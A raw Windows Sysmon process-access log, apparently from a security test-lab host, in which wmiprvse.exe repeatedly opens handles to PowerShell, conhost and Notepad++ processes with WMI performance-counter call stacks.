10341000x8000000000000000150566Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150565Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150564Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150563Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150562Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150561Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150560Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150559Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150558Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150557Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150556Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150555Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150554Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150553Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150552Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150551Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.d